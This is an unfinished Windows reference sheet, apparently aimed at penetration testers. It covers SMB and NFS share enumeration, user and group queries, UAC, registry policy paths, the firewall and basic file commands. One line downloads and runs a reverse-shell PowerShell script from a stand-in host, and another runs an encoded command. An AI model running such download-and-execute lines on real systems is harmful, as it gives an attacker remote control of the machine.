This article is currently being written.
Enumerate shares and access :
$ crackmapexec smb example.com --shares $ smbclient -L example.com
Display shared folders by the NFS server :
$ showmount -e example.com $ sudo mount -t nfs example.com:/shared_folder /mnt/folder
C:\> iwr http://example.com/ C:\> Invoke-WebRequest 'https://example.com/files/backup.zip' -OutFile C:\backup.zip
Run a PowerShell expression
C:\> IEX( IWR http://example.com/revshell.ps1 ) C:\> powershell.exe -EncodedCommand <base64>
User Account Control (UAC)
The User Account Control (UAC) aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.
Type of accounts
|Guest||Can use portable software and can not change system settings.|
|Standard||Can use portable software and change system settings that don’t affect other users.|
|Administrator||Complete control over the PC.|
|System||Complete control over the PC.|
|Domain Administrator||Complete control over all the PC of the domain.|
IPv4, DNS Server, Network Mask, Mac Adress, ...
C:\> ipconfig /all
Display all the environment variables :
- APPDATA : Path to the application data directory.
- TEMP : Path to the temporary directory.
- PUBLIC : Path to the public directory (all users have READ & WRITE permission)
- LOGONSERVER : Authentification server.
User & group information
Find information about the current user :
C:\> net user %username% C:\> net user %username% /domain
Find administration users and groups :
C:\> net localgroup administrators
Microsoft Management Console (MMC)
You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system. MMC runs on all client operating systems that are currently supported.
Lauch the MMC panel :
Displays all available information about Group Policy :
C:\> gpresult /z
Docs about gpresult.
Registry Editor (regedit)
The Windows Registry is a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for applications that opt to use the registry. The kernel, device drivers, services, Security Accounts Manager, and user interfaces can all use the registry. The registry also allows access to counters for profiling system performance.
Path for policies in regedit :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies HKEY_CURRENT_USER\Software\Policies LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies LOCAL_MACHINE\Software\Policies
Windows Firewall (officially called Windows Defender Firewall in Windows 10), is a firewall component of Microsoft Windows.
C:\> netsh advfirewall
C:\> e: E:\> d: D:\> cd Documents D:\Documents>
C:Windows system disk.
D:Data storage disk.
E:Data storage disk.
X:Disk use by Windows PE to start.
The name of a disk is just a label, the letters are totally arbitrary.
List content of a directory.
mkdir create directory.
C:\> mkdir <directory>
del delete file.
C:\> del <filename>
rmdir delete folder.
C:\> rmdir <folder>
Use the argument
/S to remove all the files within the folder.
C:\> move <src> <dst>
copy only copies files, but not the folders within.
C:\> copy <src> <dst>
xcopy copies files (including the folders within).
C:\> xcopy <src> <dst>
Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.